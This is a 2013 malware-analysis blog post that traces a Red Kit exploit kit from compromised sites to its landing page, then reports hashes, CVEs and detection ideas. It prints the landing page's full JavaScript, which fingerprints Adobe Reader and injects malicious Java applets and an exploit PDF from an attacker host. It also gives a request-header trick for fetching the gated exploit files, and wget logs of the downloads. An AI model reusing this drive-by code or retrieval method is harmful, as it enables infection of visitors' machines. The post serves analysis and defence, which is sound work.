Sunday, March 10, 2013

Analyzing Red Kit Exploit Kit made easy


having covered the Blackhole Exploit Kit lately I thought it would be a great Idea to look more into the Red Kit EK.

A good start for malicious URL's, as always is urlquery.net or malwaredomainlist.com

Todays pick was urlquery: Some poor Madonna fans having a bad day!

I just looked into the output and immediately found 2 iframes that caught my attention:

hxxp: //miamiheattickets.com/http.php
hxxp: //tucsonaccidentattorney.net/mhed.html?j=449177


0. Fetch the web pages


The second page looks especially interesting as it has the distinct pattern of a RK URL

--2013-03-10 19:48:19--  hxxp: //miamiheattickets.com/http.php
Resolving miamiheattickets.com... 174.120.81.158
Connecting to miamiheattickets.com|174.120.81.158|:80... connected.
HTTP request sent, awaiting response... 
  HTTP/1.1 404 Not Found
  Date: Sun, 10 Mar 2013 18:49:15 GMT
  Server: Apache
  Last-Modified: Tue, 10 Apr 2012 05:19:44 GMT
  Accept-Ranges: bytes
  Content-Length: 3354
  Keep-Alive: timeout=5, max=75
  Connection: Keep-Alive
  Content-Type: text/html
2013-03-10 19:48:21 ERROR 404: Not Found.

--2013-03-10 19:49:28--  hxxp: //tucsonaccidentattorney.net/mhed.html?j=449177
Resolving tucsonaccidentattorney.net... 67.18.140.14
Connecting to tucsonaccidentattorney.net|67.18.140.14|:80... connected.
HTTP request sent, awaiting response... 
  HTTP/1.1 301 Moved Permanently
  Date: Sun, 10 Mar 2013 18:50:24 GMT
  Server: Apache
  Location: hxxp: //fgccnc.org/mhed.htm?j=449177
  Content-Length: 0
  Keep-Alive: timeout=5, max=75
  Connection: Keep-Alive
  Content-Type: text/html
Location: hxxp: //fgccnc.org/mhed.htm?j=449177 [following]
--2013-03-10 19:49:30--  hxxp: //fgccnc.org/mhed.htm?j=449177
Resolving fgccnc.org... 50.22.90.99
Connecting to fgccnc.org|50.22.90.99|:80... connected.
HTTP request sent, awaiting response... 
  HTTP/1.1 200 OK
  Date: Sun, 10 Mar 2013 18:50:26 GMT
  Server: Apache
  Content-Length: 12956
  Keep-Alive: timeout=5, max=75
  Connection: Keep-Alive
  Content-Type: text/html
Length: 12956 (13K) [text/html]
Saving to: `pane2.html'

     0K .......... ..                                         100%  205M=0s

2013-03-10 19:49:33 (205 MB/s) - `pane2.html' saved [12956/12956]


Excellent :) got a hit on the second page.

1. Plugin Detect ver 0.7.7


<html>
    <script>
        var dtYWu = {
            version: "0.7.7",
            rDate: "04/11/2012",
            name: "diction",
            handler: function (c, b, a) {
                return function () {
                    c(b, a)
                }
            },
            isDefined: function (b) {
                return typeof b != "undefined"
            },
            isArray: function (b) {
                return (/array/i).test(Object.prototype.toString.call(b))
            },
            isFunc: function (b) {
                return typeof b == "function"
            },
            isString: function (b) {
                return typeof b == "string"
            },
            isNum: function (b) {
                return typeof b == "number"
            },
            isStrNum: function (b) {
                return (typeof b == "string" && (/\d/).test(b))
            },
            getNumRegx: /[\d][\d\.\_,-]*/,
            splitNumRegx: /[\.\_,-]/g,
            getNum: function (b, c) {
                var d = this,
                    a = d.isStrNum(b) ? (d.isDefined(c) ? new RegExp(c) : d.getNumRegx).exec(b) : null;
                return a ? a[0] : null
            },
            compareNums: function (h, f, d) {
                var e = this,
                    c, b, a, g = parseInt;
                if (e.isStrNum(h) && e.isStrNum(f)) {
                    if (e.isDefined(d) && d.compareNums) {
                        return d.compareNums(h, f)
                    }
                    c = h.split(e.splitNumRegx);
                    b = f.split(e.splitNumRegx);
                    for (a = 0; a < Math.min(c.length, b.length); a++) {
                        if (g(c[a], 10) > g(b[a], 10)) {
                            return 1
                        }
                        if (g(c[a], 10) < g(b[a], 10)) {
                            return -1
                        }
                    }
                }
                return 0
            },
            formatNum: function (b, c) {
                var d = this,
                    a, e;
                if (!d.isStrNum(b)) {
                    return null
                }
                if (!d.isNum(c)) {
                    c = 4
                }
                c--;
                e = b.replace(/\s/g, "").split(d.splitNumRegx).concat(["0", "0", "0", "0"]);
                for (a = 0; a < 4; a++) {
                    if (/^(0+)(.+)$/.test(e[a])) {
                        e[a] = RegExp.$2
                    }
                    if (a > c || !(/\d/).test(e[a])) {
                        e[a] = "0"
                    }
                }
                return e.slice(0, 4).join(",")
            },
            $$hasMimeType: function (a) {
                return function (c) {
                    if (!a.isIE && c) {
                        var f, e, b, d = a.isArray(c) ? c : (a.isString(c) ? [c] : []);
                        for (b = 0; b < d.length; b++) {
                            if (a.isString(d[b]) && /[^\s]/.test(d[b])) {
                                f = navigator.mimeTypes[d[b]];
                                e = f ? f.enabledPlugin : 0;
                                if (e && (e.name || e.description)) {
                                    return f
                                }
                            }
                        }
                    }
                    return null
                }
            },
            findNavPlugin: function (l, e, c) {
                var j = this,
                    h = new RegExp(l, "i"),
                    d = (!j.isDefined(e) || e) ? /\d/ : 0,
                    k = c ? new RegExp(c, "i") : 0,
                    a = navigator.plugins,
                    g = "",
                    f, b, m;
                for (f = 0; f < a.length; f++) {
                    m = a[f].description || g;
                    b = a[f].name || g;
                    if ((h.test(m) && (!d || d.test(RegExp.leftContext + RegExp.rightContext))) || (h.test(b) && (!d || d.test(RegExp.leftContext + RegExp.rightContext)))) {
                        if (!k || !(k.test(m) || k.test(b))) {
                            return a[f]
                        }
                    }
                }
                return null
            },
            getMimeEnabledPlugin: function (k, m, c) {
                var e = this,
                    f, b = new RegExp(m, "i"),
                    h = "",
                    g = c ? new RegExp(c, "i") : 0,
                    a, l, d, j = e.isString(k) ? [k] : k;
                for (d = 0; d < j.length; d++) {
                    if ((f = e.hasMimeType(j[d])) && (f = f.enabledPlugin)) {
                        l = f.description || h;
                        a = f.name || h;
                        if (b.test(l) || b.test(a)) {
                            if (!g || !(g.test(l) || g.test(a))) {
                                return f
                            }
                        }
                    }
                }
                return 0
            },
            getPluginFileVersion: function (f, b) {
                var h = this,
                    e, d, g, a, c = -1;
                if (h.OS > 2 || !f || !f.version || !(e = h.getNum(f.version))) {
                    return b
                }
                if (!b) {
                    return e
                }
                e = h.formatNum(e);
                b = h.formatNum(b);
                d = b.split(h.splitNumRegx);
                g = e.split(h.splitNumRegx);
                for (a = 0; a < d.length; a++) {
                    if (c > -1 && a > c && d[a] != "0") {
                        return b
                    }
                    if (g[a] != d[a]) {
                        if (c == -1) {
                            c = a
                        }
                        if (d[a] != "0") {
                            return b
                        }
                    }
                }
                return e
            },
            AXO: window.ActiveXObject,
            getAXO: function (a) {
                var f = null,
                    d, b = this,
                    c = {};
                try {
                    f = new b.AXO(a)
                } catch (d) {}
                return f
            },
            convertFuncs: function (f) {
                var a, g, d, b = /^[$][$]/,
                    c = this;
                for (a in f) {
                    if (b.test(a)) {
                        try {
                            g = a.slice(2);
                            if (g.length > 0 && !f[g]) {
                                f[g] = f[a](f);
                                delete f[a]
                            }
                        } catch (d) {}
                    }
                }
            },
            initObj: function (e, b, d) {
                var a, c;
                if (e) {
                    if (e[b[0]] == 1 || d) {
                        for (a = 0; a < b.length; a = a + 2) {
                            e[b[a]] = b[a + 1]
                        }
                    }
                    for (a in e) {
                        c = e[a];
                        if (c && c[b[0]] == 1) {
                            this.initObj(c, b)
                        }
                    }
                }
            },
            initScript: function () {
                var c = this,
                    a = navigator,
                    e = "/",
                    f, i = a.userAgent || "",
                    g = a.vendor || "",
                    b = a.platform || "",
                    h = a.product || "";
                c.initObj(c, ["$", c]);
                for (f in c.Plugins) {
                    if (c.Plugins[f]) {
                        c.initObj(c.Plugins[f], ["$", c, "$$", c.Plugins[f]], 1)
                    }
                };
                c.OS = 100;
                if (b) {
                    var d = ["Win", 1, "Mac", 2, "Linux", 3, "FreeBSD", 4, "iPhone", 21.1, "iPod", 21.2, "iPad", 21.3, "Win.*CE", 22.1, "Win.*Mobile", 22.2, "Pocket\s*PC", 22.3, "", 100];
                    for (f = d.length - 2; f >= 0; f = f - 2) {
                        if (d[f] && new RegExp(d[f], "i").test(b)) {
                            c.OS = d[f + 1];
                            break
                        }
                    }
                }
                c.convertFuncs(c);
                c.head = (document.getElementsByTagName("head")[0] || document.getElementsByTagName("body")[0] || document.body || null);
                c.isIE = (new Function("return " + e + "*@cc_on!@*" + e + "false"))();
                c.verIE = c.isIE && (/MSIE\s*(\d+\.?\d*)/i).test(i) ? parseFloat(RegExp.$1, 10) : null;
                c.ActiveXEnabled = false;
                if (c.isIE) {
                    var f, j = ["Msxml2.XMLHTTP", "Msxml2.DOMDocument", "Microsoft.XMLDOM", "ShockwaveFlash.ShockwaveFlash", "TDCCtl.TDCCtl", "Shell.UIHelper", "Scripting.Dictionary", "wmplayer.ocx"];
                    for (f = 0; f < j.length; f++) {
                        if (c.getAXO(j[f])) {
                            c.ActiveXEnabled = true;
                            break
                        }
                    }
                }
                c.isGecko = (/Gecko/i).test(h) && (/Gecko\s*\/\s*\d/i).test(i);
                c.verGecko = c.isGecko ? c.formatNum((/rv\s*\:\s*([\.\,\d]+)/i).test(i) ? RegExp.$1 : "0.9") : null;
                c.isChrome = (/Chrome\s*\/\s*(\d[\d\.]*)/i).test(i);
                c.verChrome = c.isChrome ? c.formatNum(RegExp.$1) : null;
                c.isSafari = ((/Apple/i).test(g) || (!g && !c.isChrome)) && (/Safari\s*\/\s*(\d[\d\.]*)/i).test(i);
                c.verSafari = c.isSafari && (/Version\s*\/\s*(\d[\d\.]*)/i).test(i) ? c.formatNum(RegExp.$1) : null;
                c.isOpera = (/Opera\s*[\/]?\s*(\d+\.?\d*)/i).test(i);
                c.verOpera = c.isOpera && ((/Version\s*\/\s*(\d+\.?\d*)/i).test(i) || 1) ? parseFloat(RegExp.$1, 10) : null;
                c.addWinEvent("load", c.handler(c.runWLfuncs, c))
            },
            init: function (d) {
                var c = this,
                    b, d, a = {
                        status: -3,
                        plugin: 0
                    };
                if (!c.isString(d)) {
                    return a
                }
                if (d.length == 1) {
                    c.getVersionDelimiter = d;
                    return a
                }
                d = d.toLowerCase().replace(/\s/g, "");
                b = c.Plugins[d];
                if (!b || !b.getVersion) {
                    return a
                }
                a.plugin = b;
                if (!c.isDefined(b.installed)) {
                    b.installed = null;
                    b.version = null;
                    b.version0 = null;
                    b.getVersionDone = null;
                    b.pluginName = d
                }
                c.garbage = false;
                if (c.isIE && !c.ActiveXEnabled && d !== "java") {
                    a.status = -2;
                    return a
                }
                a.status = 1;
                return a
            },
            fPush: function (b, a) {
                var c = this;
                if (c.isArray(a) && (c.isFunc(b) || (c.isArray(b) && b.length > 0 && c.isFunc(b[0])))) {
                    a.push(b)
                }
            },
            callArray: function (b) {
                var c = this,
                    a;
                if (c.isArray(b)) {
                    for (a = 0; a < b.length; a++) {
                        if (b[a] === null) {
                            return
                        }
                        c.call(b[a]);
                        b[a] = null
                    }
                }
            },
            call: function (c) {
                var b = this,
                    a = b.isArray(c) ? c.length : -1;
                if (a > 0 && b.isFunc(c[0])) {
                    c[0](b, a > 1 ? c[1] : 0, a > 2 ? c[2] : 0, a > 3 ? c[3] : 0)
                } else {
                    if (b.isFunc(c)) {
                        c(b)
                    }
                }
            },
            getVersionDelimiter: ",",
            $$getVersion: function (a) {
                return function (g, d, c) {
                    var e = a.init(g),
                        f, b, h = {};
                    if (e.status < 0) {
                        return null
                    };
                    f = e.plugin;
                    if (f.getVersionDone != 1) {
                        f.getVersion(null, d, c);
                        if (f.getVersionDone === null) {
                            f.getVersionDone = 1
                        }
                    }
                    a.cleanup();
                    b = (f.version || f.version0);
                    b = b ? b.replace(a.splitNumRegx, a.getVersionDelimiter) : b;
                    return b
                }
            },
            cleanup: function () {},
            addWinEvent: function (d, c) {
                var e = this,
                    a = window,
                    b;
                if (e.isFunc(c)) {
                    if (a.addEventListener) {
                        a.addEventListener(d, c, false)
                    } else {
                        if (a.attachEvent) {
                            a.attachEvent("on" + d, c)
                        } else {
                            b = a["on" + d];
                            a["on" + d] = e.winHandler(c, b)
                        }
                    }
                }
            },
            winHandler: function (d, c) {
                return function () {
                    d();
                    if (typeof c == "function") {
                        c()
                    }
                }
            },
            WLfuncs0: [],
            WLfuncs: [],
            runWLfuncs: function (a) {
                var b = {};
                a.winLoaded = true;
                a.callArray(a.WLfuncs0);
                a.callArray(a.WLfuncs);
                if (a.onDoneEmptyDiv) {
                    a.onDoneEmptyDiv()
                }
            },
            winLoaded: false,
            $$onWindowLoaded: function (a) {
                return function (b) {
                    if (a.winLoaded) {
                        a.call(b)
                    } else {
                        a.fPush(b, a.WLfuncs)
                    }
                }
            },
            div: null,
            divID: "plugindetect",
            divWidth: 50,
            pluginSize: 1,
            emptyDiv: function () {
                var d = this,
                    b, h, c, a, f, g;
                if (d.div && d.div.childNodes) {
                    for (b = d.div.childNodes.length - 1; b >= 0; b--) {
                        c = d.div.childNodes[b];
                        if (c && c.childNodes) {
                            for (h = c.childNodes.length - 1; h >= 0; h--) {
                                g = c.childNodes[h];
                                try {
                                    c.removeChild(g)
                                } catch (f) {}
                            }
                        }
                        if (c) {
                            try {
                                d.div.removeChild(c)
                            } catch (f) {}
                        }
                    }
                }
                if (!d.div) {
                    a = document.getElementById(d.divID);
                    if (a) {
                        d.div = a
                    }
                }
                if (d.div && d.div.parentNode) {
                    try {
                        d.div.parentNode.removeChild(d.div)
                    } catch (f) {}
                    d.div = null
                }
            },
            DONEfuncs: [],
            onDoneEmptyDiv: function () {
                var c = this,
                    a, b;
                if (!c.winLoaded) {
                    return
                }
                if (c.WLfuncs && c.WLfuncs.length && c.WLfuncs[c.WLfuncs.length - 1] !== null) {
                    return
                }
                for (a in c) {
                    b = c[a];
                    if (b && b.funcs) {
                        if (b.OTF == 3) {
                            return
                        }
                        if (b.funcs.length && b.funcs[b.funcs.length - 1] !== null) {
                            return
                        }
                    }
                }
                for (a = 0; a < c.DONEfuncs.length; a++) {
                    c.callArray(c.DONEfuncs)
                }
                c.emptyDiv()
            },
            getWidth: function (c) {
                if (c) {
                    var a = c.scrollWidth || c.offsetWidth,
                        b = this;
                    if (b.isNum(a)) {
                        return a
                    }
                }
                return -1
            },
            getTagStatus: function (m, g, a, b) {
                var c = this,
                    f, k = m.span,
                    l = c.getWidth(k),
                    h = a.span,
                    j = c.getWidth(h),
                    d = g.span,
                    i = c.getWidth(d);
                if (!k || !h || !d || !c.getDOMobj(m)) {
                    return -2
                }
                if (j < i || l < 0 || j < 0 || i < 0 || i <= c.pluginSize || c.pluginSize < 1) {
                    return 0
                }
                if (l >= i) {
                    return -1
                }
                try {
                    if (l == c.pluginSize && (!c.isIE || c.getDOMobj(m).readyState == 4)) {
                        if (!m.winLoaded && c.winLoaded) {
                            return 1
                        }
                        if (m.winLoaded && c.isNum(b)) {
                            if (!c.isNum(m.count)) {
                                m.count = b
                            }
                            if (b - m.count >= 10) {
                                return 1
                            }
                        }
                    }
                } catch (f) {}
                return 0
            },
            getDOMobj: function (g, a) {
                var f, d = this,
                    c = g ? g.span : 0,
                    b = c && c.firstChild ? 1 : 0;
                try {
                    if (b && a) {
                        d.div.focus()
                    }
                } catch (f) {}
                return b ? c.firstChild : null
            },
            setStyle: function (b, g) {
                var f = b.style,
                    a, d, c = this;
                if (f && g) {
                    for (a = 0; a < g.length; a = a + 2) {
                        try {
                            f[g[a]] = g[a + 1]
                        } catch (d) {}
                    }
                }
            },
            insertDivInBody: function (a, i) {
                var h, f = this,
                    b = "pd33993399",
                    d = null,
                    j = i ? window.top.document : window.document,
                    c = "<",
                    g = (j.getElementsByTagName("body")[0] || j.body);
                if (!g) {
                    try {
                        j.write(c + 'div id="' + b + '">o' + c + "/div>");
                        d = j.getElementById(b)
                    } catch (h) {}
                }
                g = (j.getElementsByTagName("body")[0] || j.body);
                if (g) {
                    if (g.firstChild && f.isDefined(g.insertBefore)) {
                        g.insertBefore(a, g.firstChild)
                    } else {
                        g.appendChild(a)
                    }
                    if (d) {
                        g.removeChild(d)
                    }
                } else {}
            },
            insertHTML: function (g, b, h, a, l) {
                var m, n = document,
                    k = this,
                    q, p = n.createElement("span"),
                    o, j, f = "<";
                var c = ["outlineStyle", "none", "borderStyle", "none", "padding", "0px", "margin", "0px", "visibility", "visible"];
                var i = "outline-style:none;border-style:none;padding:0px;margin:0px;visibility:visible;";
                if (!k.isDefined(a)) {
                    a = ""
                }
                if (k.isString(g) && (/[^\s]/).test(g)) {
                    g = g.toLowerCase().replace(/\s/g, "");
                    q = f + g + ' width="' + k.pluginSize + '" height="' + k.pluginSize + '" ';
                    q += 'style="' + i + 'display:inline;" ';
                    for (o = 0; o < b.length; o = o + 2) {
                        if (/[^\s]/.test(b[o + 1])) {
                            q += b[o] + '="' + b[o + 1] + '" '
                        }
                    }
                    q += ">";
                    for (o = 0; o < h.length; o = o + 2) {
                        if (/[^\s]/.test(h[o + 1])) {
                            q += f + 'param name="' + h[o] + '" value="' + h[o + 1] + '" />'
                        }
                    }
                    q += a + f + "/" + g + ">"
                } else {
                    q = a
                }
                if (!k.div) {
                    j = n.getElementById(k.divID);
                    if (j) {
                        k.div = j
                    } else {
                        k.div = n.createElement("div");
                        k.div.id = k.divID
                    }
                    k.setStyle(k.div, c.concat(["width", k.divWidth + "px", "height", (k.pluginSize + 3) + "px", "fontSize", (k.pluginSize + 3) + "px", "lineHeight", (k.pluginSize + 3) + "px", "verticalAlign", "baseline", "display", "block"]));
                    if (!j) {
                        k.setStyle(k.div, ["position", "absolute", "right", "0px", "top", "0px"]);
                        k.insertDivInBody(k.div)
                    }
                }
                if (k.div && k.div.parentNode) {
                    k.setStyle(p, c.concat(["fontSize", (k.pluginSize + 3) + "px", "lineHeight", (k.pluginSize + 3) + "px", "verticalAlign", "baseline", "display", "inline"]));
                    try {
                        p.innerHTML = q
                    } catch (m) {};
                    try {
                        k.div.appendChild(p)
                    } catch (m) {};
                    return {
                        span: p,
                        winLoaded: k.winLoaded,
                        tagName: g,
                        outerHTML: q
                    }
                }
                return {
                    span: null,
                    winLoaded: k.winLoaded,
                    tagName: "",
                    outerHTML: q
                }
            },
            Plugins: {
                adobereader: {
                    mimeType: "application/pdf",
                    navPluginObj: null,
                    progID: ["AcroPDF.PDF", "PDF.PdfCtrl"],
                    classID: "clsid:CA8A9780-280D-11CF-A24D-444553540000",
                    INSTALLED: {},
                    pluginHasMimeType: function (d, c, f) {
                        var b = this,
                            e = b.$,
                            a;
                        for (a in d) {
                            if (d[a] && d[a].type && d[a].type == c) {
                                return 1
                            }
                        }
                        if (e.getMimeEnabledPlugin(c, f)) {
                            return 1
                        }
                        return 0
                    },
                    getVersion: function (l, j) {
                        var g = this,
                            d = g.$,
                            i, f, m, n, b = null,
                            h = null,
                            k = g.mimeType,
                            a, c;
                        if (d.isString(j)) {
                            j = j.replace(/\s/g, "");
                            if (j) {
                                k = j
                            }
                        } else {
                            j = null
                        }
                        if (d.isDefined(g.INSTALLED[k])) {
                            g.installed = g.INSTALLED[k];
                            return
                        }
                        if (!d.isIE) {
                            a = "Adobe.*PDF.*Plug-?in|Adobe.*Acrobat.*Plug-?in|Adobe.*Reader.*Plug-?in";
                            if (g.getVersionDone !== 0) {
                                g.getVersionDone = 0;
                                b = d.getMimeEnabledPlugin(g.mimeType, a);
                                if (!j) {
                                    n = b
                                }
                                if (!b && d.hasMimeType(g.mimeType)) {
                                    b = d.findNavPlugin(a, 0)
                                }
                                if (b) {
                                    g.navPluginObj = b;
                                    h = d.getNum(b.description) || d.getNum(b.name);
                                    h = d.getPluginFileVersion(b, h);
                                    if (!h && d.OS == 1) {
                                        if (g.pluginHasMimeType(b, "application/vnd.adobe.pdfxml", a)) {
                                            h = "9"
                                        } else {
                                            if (g.pluginHasMimeType(b, "application/vnd.adobe.x-mars", a)) {
                                                h = "8"
                                            }
                                        }
                                    }
                                }
                            } else {
                                h = g.version
                            }
                            if (!d.isDefined(n)) {
                                n = d.getMimeEnabledPlugin(k, a)
                            }
                            g.installed = n && h ? 1 : (n ? 0 : (g.navPluginObj ? -0.2 : -1))
                        } else {
                            b = d.getAXO(g.progID[0]) || d.getAXO(g.progID[1]);
                            c = /=\s*([\d\.]+)/g;
                            try {
                                f = (b || d.getDOMobj(d.insertHTML("object", ["classid", g.classID], ["src", ""], "", g))).GetVersions();
                                for (m = 0; m < 5; m++) {
                                    if (c.test(f) && (!h || RegExp.$1 > h)) {
                                        h = RegExp.$1
                                    }
                                }
                            } catch (i) {}
                            g.installed = h ? 1 : (b ? 0 : -1)
                        }
                        if (!g.version) {
                            g.version = d.formatNum(h)
                        }
                        g.INSTALLED[k] = g.installed
                    }
                },
                zz: 0
            }
        };
    </script>
    
    <body>
        <script>
            document.write('<applet archive="hxxp: //fgccnc.org/332.j&#97;r" code="Vlast.class"><param name="elitken" value="l16r3o5uvme2r3o5uvtcwr3o5uvhair3o5uv.ecr3o5uv3hyr3o5uv3vcr3o5uv/gar3o5uvgo2r3o5uvrabr3o5uvoqkr3o5uv.dar3o5uvch3r3o5uvncrr3o5uvchkr3o5uvch9r3o5uvg3tr3o5uvf14r3o5uv/q9r3o5uv/brr3o5uv:rer3o5uvpovr3o5uvtzrr3o5uvtalr3o5uvhlzr3o5uv"></applet>');
            document.write('<applet archive="hxxp: //fgccnc.org/887.j&#97;r" code="Vlast.class"><param name="elitken" value="l80r3o5uvm16r3o5uvtm6r3o5uvhrcr3o5uv.mcr3o5uv1gwr3o5uv4zlr3o5uv/kwr3o5uvgvar3o5uvr1wr3o5uvo2or3o5uv.56r3o5uvcidr3o5uvn3yr3o5uvccvr3o5uvcsar3o5uvgm4r3o5uvfpgr3o5uv/tor3o5uv/61r3o5uv:o4r3o5uvpkcr3o5uvt1gr3o5uvt59r3o5uvhhmr3o5uv"></applet>');
        </script>
        <script type="text/javascript">
            var biiz = "s" + "r" + "c";
            var makral = false;


            function tksmke() {
                otrtorol.setAttribute("width", 25);
                otrtorol.setAttribute("height", 22);
                document.body.appendChild(otrtorol);
                otrtorol.setAttribute(biiz, "hxxp: //fgccnc.org/987.pdf");
            }

            function etract(a, b) {
                if ((a == 8 && b < 4) || (a == 9 && b < 4)) makral = true;
            }

            var otrtorol = document.createElement("ifra" + "me");

            dtYWu.initScript();


            function ygutiy(lite, arwtawt) {
                if (arwtawt) {
                    arwtawt = arwtawt.split(',');
                    etract(arwtawt[0], arwtawt[1]);
                }
            }

            ygutiy(1, dtYWu.getVersion("AdobeReader"));
            while (makral) {
                tksmke();
                makral = false;
            }
        </script>
    </body>

</html>
The most interesting are the links to the exploit files

document.write('&lt;applet archive="hxxp: //fgccnc.org/332.j&amp;#97;r" code="Vlast.class"&gt;&lt;param name="elitken" value="l16r3o5uvme2r3o5uvtcwr3o5uvhair3o5uv.ecr3o5uv3hyr3o5uv3vcr3o5uv/gar3o5uvgo2r3o5uvrabr3o5uvoqkr3o5uv.dar3o5uvch3r3o5uvncrr3o5uvchkr3o5uvch9r3o5uvg3tr3o5uvf14r3o5uv/q9r3o5uv/brr3o5uv:rer3o5uvpovr3o5uvtzrr3o5uvtalr3o5uvhlzr3o5uv"&gt;&lt;/applet&gt;');

            document.write('&lt;applet archive="hxxp: //fgccnc.org/887.j&amp;#97;r" code="Vlast.class"&gt;&lt;param name="elitken" value="l80r3o5uvm16r3o5uvtm6r3o5uvhrcr3o5uv.mcr3o5uv1gwr3o5uv4zlr3o5uv/kwr3o5uvgvar3o5uvr1wr3o5uvo2or3o5uv.56r3o5uvcidr3o5uvn3yr3o5uvccvr3o5uvcsar3o5uvgm4r3o5uvfpgr3o5uv/tor3o5uv/61r3o5uv:o4r3o5uvpkcr3o5uvt1gr3o5uvt59r3o5uvhhmr3o5uv"&gt;&lt;/applet&gt;');

        &lt;/script&gt;

        &lt;script type="text/javascript"&gt;

            var biiz = "s" + "r" + "c";

            var makral = false;





            function tksmke() {

                otrtorol.setAttribute("width", 25);

                otrtorol.setAttribute("height", 22);

                document.body.appendChild(otrtorol);

                otrtorol.setAttribute(biiz, "hxxp: //fgccnc.org/987.pdf");

            }


2 JAR's and ome PDF: 332.jar, 887.jar and 987.pdf

2. Fetch the exploit files, -NOT


--2013-03-10 19:57:03--  hxxp: //fgccnc.org/332.jar
Resolving fgccnc.org... 50.22.90.99
Connecting to fgccnc.org|50.22.90.99|:80... connected.
HTTP request sent, awaiting response... 
  HTTP/1.1 404 Not Found
  Date: Sun, 10 Mar 2013 18:57:57 GMT
  Server: Apache
  Content-Length: 0
  Keep-Alive: timeout=5, max=75
  Connection: Keep-Alive
  Content-Type: text/html
2013-03-10 19:57:05 ERROR 404: Not Found.

--2013-03-10 19:58:32--  hxxp: //fgccnc.org/332.jar
Resolving fgccnc.org... 50.22.90.99
Connecting to fgccnc.org|50.22.90.99|:80... connected.
HTTP request sent, awaiting response... 
  HTTP/1.1 404 Not Found
  Date: Sun, 10 Mar 2013 18:59:26 GMT
  Server: Apache
  Content-Length: 0
  Keep-Alive: timeout=5, max=75
  Connection: Keep-Alive
  Content-Type: text/html
2013-03-10 19:58:34 ERROR 404: Not Found.

--2013-03-10 19:58:53--  hxxp: //fgccnc.org/332.jar
Resolving fgccnc.org... 50.22.90.99
Connecting to fgccnc.org|50.22.90.99|:80... connected.
HTTP request sent, awaiting response... 
  HTTP/1.1 404 Not Found
  Date: Sun, 10 Mar 2013 18:59:47 GMT
  Server: Apache
  Content-Length: 0
  Keep-Alive: timeout=5, max=75
  Connection: Keep-Alive
  Content-Type: text/html
2013-03-10 19:58:56 ERROR 404: Not Found.


Nope! 404's all over my screen. Not so easy to pick these low hanging fruit after all...
Fortunately my GOOGLE fu is with me and I found a great hint over @ day by day blog

3. Header FU

Add these headers to the request:
content-type: application/x-java-archive
Accept: text/html, image/gif, *; q=.2, */*; q=.2

That would have taken me ages to figure out, but now I'm happy


4. Fetch the exploit files - for real


--2013-03-10 20:02:13--  hxxp: //fgccnc.org/332.jar
Resolving fgccnc.org... 50.22.90.99
Connecting to fgccnc.org|50.22.90.99|:80... connected.
HTTP request sent, awaiting response... 
  HTTP/1.1 200 OK
  Date: Sun, 10 Mar 2013 19:03:08 GMT
  Server: Apache
  Content-Disposition: inline; filename=e55de572.jar
  Content-Length: 13798
  Keep-Alive: timeout=5, max=75
  Connection: Keep-Alive
  Content-Type: application/java-archive
Length: 13798 (13K) [application/java-archive]
Saving to: `332.jar'

     0K .......... ...                                        100% 2.65M=0.005s

2013-03-10 20:02:15 (2.65 MB/s) - `332.jar' saved [13798/13798]

--2013-03-10 20:03:30--  hxxp: //fgccnc.org/887.jar
Resolving fgccnc.org... 50.22.90.99
Connecting to fgccnc.org|50.22.90.99|:80... connected.
HTTP request sent, awaiting response... 
  HTTP/1.1 200 OK
  Date: Sun, 10 Mar 2013 19:04:25 GMT
  Server: Apache
  Content-Disposition: inline; filename=31d64b95.jar
  Content-Length: 13731
  Keep-Alive: timeout=5, max=75
  Connection: Keep-Alive
  Content-Type: application/java-archive
Length: 13731 (13K) [application/java-archive]
Saving to: `887.jar'

     0K .......... ...                                        100% 4.37M=0.003s

2013-03-10 20:03:32 (4.37 MB/s) - `887.jar' saved [13731/13731]

--2013-03-10 20:04:26--  hxxp: //fgccnc.org/987.pdf
Resolving fgccnc.org... 50.22.90.99
Connecting to fgccnc.org|50.22.90.99|:80... connected.
HTTP request sent, awaiting response... 
  HTTP/1.1 200 OK
  Date: Sun, 10 Mar 2013 19:05:20 GMT
  Server: Apache
  Content-Disposition: inline; filename=bb43a521.pdf
  Content-Length: 5531
  Keep-Alive: timeout=5, max=75
  Connection: Keep-Alive
  Content-Type: application/pdf
Length: 5531 (5.4K) [application/pdf]
Saving to: `987.pdf'

     0K .....                                                 100%  113M=0s

2013-03-10 20:04:28 (113 MB/s) - `987.pdf' saved [5531/5531]


Excellent. The files are downloaded. Time for a quick analysis:

5. Quick analysis


Lets figure out what the bad guys wanted to send to us and what payload they really wanted to hand over to the poor Maddonna fans.

332.jar
MD5: 913f1d801abd70a483888ea20aad3a73
Virustotal: 5/45 https://www.virustotal.com/en/file/08759205ed8a2030e659e2ee843c56d13fadd18cdb1a5e1a077bd4e8422dd035/analysis/1362953517/
CVE-2012-1723

887.jar
MD5: 60de68f7919603650a50633f82da7c9b
Virustotal: 6/45 https://www.virustotal.com/en/file/912991ab959148febe90297815dd3025507bad10ffebe7555dfddf7708dd6566/analysis/1362953559/

987.pdf
MD5: 67c5a657b54cf4dc9cae74bfb763a285
Virustotal: 2/45 https://www.virustotal.com/en/file/7be4238988221318f2ca6c41419fd452d892d0af62efa9834d55411900ecfbc3/analysis/1362953625/
WepaWet: Malicious http://wepawet.iseclab.org/view.php?hash=67c5a657b54cf4dc9cae74bfb763a285&type=js
CVE-2010-0188


As wepawet is kind enough to give us the URL to the EXE:

6. Fetching the final payload


--2013-03-10 20:08:26--  hxxp: //fgccnc.org/62.html
Resolving fgccnc.org... 50.22.90.99
Connecting to fgccnc.org|50.22.90.99|:80... connected.
HTTP request sent, awaiting response... 
  HTTP/1.1 200 OK
  Date: Sun, 10 Mar 2013 19:09:21 GMT
  Server: Apache
  Expires: Mon, 20 Aug 2002 02:00:00 GMT
  Pragma: no-cache
  Cache-Control: no-cache
  Content-Transfer-Encoding: binary
  Content-Disposition: inline; filename=setup.exe
  Content-Length: 32128
  Keep-Alive: timeout=5, max=75
  Connection: Keep-Alive
  Content-Type: application/octet-stream
Length: 32128 (31K) [application/octet-stream]
Saving to: `62.exe'

     0K .......... .......... .......... .                    100% 51.3K=0.6s
2013-03-10 20:08:29 (51.3 KB/s) - `62.exe' saved [32128/32128]


62.exe AKA setup.exe
MD5:5b7c57fb83f0e47821b97fb93f055716
Virustotal: 0/45

Hmmmf; 0/45 @ VT and no MZ first in the file. Need too look more into this...

7. IDS signatures


As a sidestep writing IDS signatures for calls to 332.jar, 887.jar, 987.pdf, 62.html and receiving setup.exe and the URL pattern [a-z][a-z][a-z][a-z]\.html\?.=[0-9][0-9][0-9][0-9][0-9][0-9] should give you better sleep at night if you work with detection and intrusion prevention / detection.


